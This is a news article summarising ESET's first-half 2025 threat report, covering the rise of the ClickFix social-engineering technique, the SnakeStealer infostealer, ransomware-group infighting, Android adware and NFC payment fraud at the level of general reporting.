ClickFix, SnakeStealer, and NFC fraud dominate ESET threat landscape in H1 2025 cybersecurity report

Why is ClickFix now the second most common cyberattack method according to ESET’s 2025 report?

ESET, a global leader in endpoint protection and threat research, has identified a dramatic shift in the digital threat landscape in the first half of 2025. According to its latest Threat Report, the deceptive attack vector known as ClickFix surged by over 500% compared to the second half of 2024, becoming the second most common attack method globally after phishing. This single tactic was responsible for nearly 8% of all threats blocked through ESET telemetry during the reporting period.

ClickFix lures users with convincing but fake system error messages that trick them into copying and pasting malicious commands directly into their operating system terminals. This manipulation method bypasses traditional malware delivery techniques and affects all major platforms including Windows, Linux, and macOS. According to ESET’s Director of Threat Prevention Labs, Jiří Kropáč, ClickFix is enabling a wide array of malicious payloads such as infostealers, ransomware, remote access trojans, cryptominers, post-exploitation frameworks, and even custom nation-state-aligned malware.

First observed in late 2024, ClickFix’s rise coincides with broader changes in how attackers exploit human psychology rather than system vulnerabilities. Analysts say its emergence signals a shift in threat actor priorities—from exploiting code to manipulating behavior—underscoring the need for stronger user education and endpoint visibility across devices.

What factors contributed to SnakeStealer overtaking Agent Tesla as the leading infostealer in 2025?

Another significant development noted in the ESET Threat Report H1 2025 is the rise of SnakeStealer, also known as Snake Keylogger, which has overtaken Agent Tesla to become the most commonly detected infostealer across ESET’s global telemetry. SnakeStealer is capable of logging keystrokes, extracting stored credentials, collecting clipboard data, and taking screenshots of infected systems, offering threat actors a versatile toolkit for information theft.

Institutional cybersecurity analysts believe that SnakeStealer’s growing appeal lies in its modularity and adaptability across threat campaigns. It is frequently bundled with ClickFix payloads, creating a potent threat combination that avoids detection by traditional antivirus systems. The continued decline in Agent Tesla’s visibility suggests the aging malware family may be losing effectiveness or popularity among cybercriminals.

ESET also reported progress in its collaboration with law enforcement and threat intelligence networks to dismantle malware-as-a-service ecosystems, including coordinated takedown operations targeting Lumma Stealer and Danabot. Prior to being disrupted, both services saw increased activity, with Lumma rising 21% and Danabot surging 52% in usage compared to H2 2024. This reinforces the conclusion that demand for credential theft and surveillance tools remains strong, even amid law enforcement crackdowns.

How have internal disputes among ransomware gangs like RansomHub impacted the broader threat ecosystem?

Despite a rise in ransomware activity during 2024 and early 2025, ESET’s data indicates that ransom payments have declined—suggesting a breakdown in trust between attackers and victims. The report attributes this trend to several contributing factors, including the collapse of some ransomware-as-a-service groups, exit scams, and increasing pressure from coordinated global takedowns.

RansomHub, one of the most prominent ransomware ecosystems, was directly affected by infighting among affiliates and rival factions. These disputes have caused disruptions to operations, delayed ransom negotiations, and triggered reputational damage among victim organizations. Analysts believe this internal chaos is creating new opportunities for defenders, as fractured operations lead to lower coordination and slower response times among attackers.

While the number of active ransomware groups continues to grow, their operational capacity appears more volatile than ever. The combination of internal disputes and heightened law enforcement pressure may help explain why some ransomware groups are shifting their tactics toward faster, smaller payouts and data theft, rather than large-scale encryption events.

What is the strategic significance of the surge in mobile adware and NFC fraud malware for enterprise security?

On the mobile front, ESET’s H1 2025 report identifies a 160% increase in Android adware detections, fueled primarily by the emergence of a sophisticated malware family named Kaleidoscope. This new threat adopts an “evil twin” strategy, distributing apps that appear legitimate but instead bombard users with invasive advertisements, draining device resources and opening the door to further infection.

Even more alarming, however, is the explosion in near-field communication (NFC)-based fraud. According to ESET, these attacks increased by more than 35-fold during the first half of 2025. Threat actors are leveraging tools such as GhostTap and SuperCard X to steal credit card information and clone it into digital wallets, which are then used to make fraudulent contactless payments globally.

GhostTap operates by harvesting card credentials and syncing them to an attacker’s mobile device, while SuperCard X presents itself as a harmless NFC utility but operates as a malware-as-a-service platform with built-in relay capabilities. Institutional investors and cybersecurity researchers have flagged these developments as particularly troubling for financial institutions and payment processors, who now face a growing volume of mobile-based fraud vectors that evade traditional point-of-sale defenses.

What broader cybersecurity trends are reflected in ESET’s H1 2025 threat analysis?

The first half of 2025 paints a picture of an increasingly diversified and behaviorally driven threat landscape. From the ClickFix attack’s social engineering ingenuity to the rise of modular mobile malware and fractured ransomware syndicates, the report signals a pivot away from traditional code exploits toward more adaptive, user-centric attack models.

In response to these evolving threats, enterprise security providers are being urged to invest in more dynamic behavioral analytics, integrated endpoint detection and response (EDR), and targeted employee training. Institutional investors monitoring the cybersecurity industry suggest that firms offering next-generation AI-native solutions—particularly those combining telemetry with real-time response—are likely to see growing demand in the second half of 2025.

ESET’s own detection and disruption efforts underscore the strategic role of collaborative threat intelligence in countering the malware-as-a-service business model. While the threat landscape remains volatile, the continued involvement of private-sector cybersecurity firms in dismantling criminal infrastructure provides hope for greater resilience.

What is the expected outlook for threat vectors such as ClickFix, SnakeStealer, and NFC fraud in H2 2025?

Looking ahead to the second half of the year, analysts expect further developments in social engineering campaigns, particularly those targeting multi-platform users. ClickFix and SnakeStealer are expected to remain dominant threats, as their low entry costs and high success rates make them attractive to a wide range of cybercriminals. The trajectory of mobile and NFC-based fraud also points to higher risks for digital wallets and contactless payment ecosystems, especially in regions with high mobile penetration and limited fraud oversight.

Cybersecurity providers are preparing for further evolution in these attack patterns, with a growing emphasis on real-time behavioral defense models and cross-platform security orchestration. Meanwhile, ESET is expected to release additional telemetry data later in 2025, which will offer more clarity on how successful current mitigation strategies have been in reducing the prevalence of these attack types.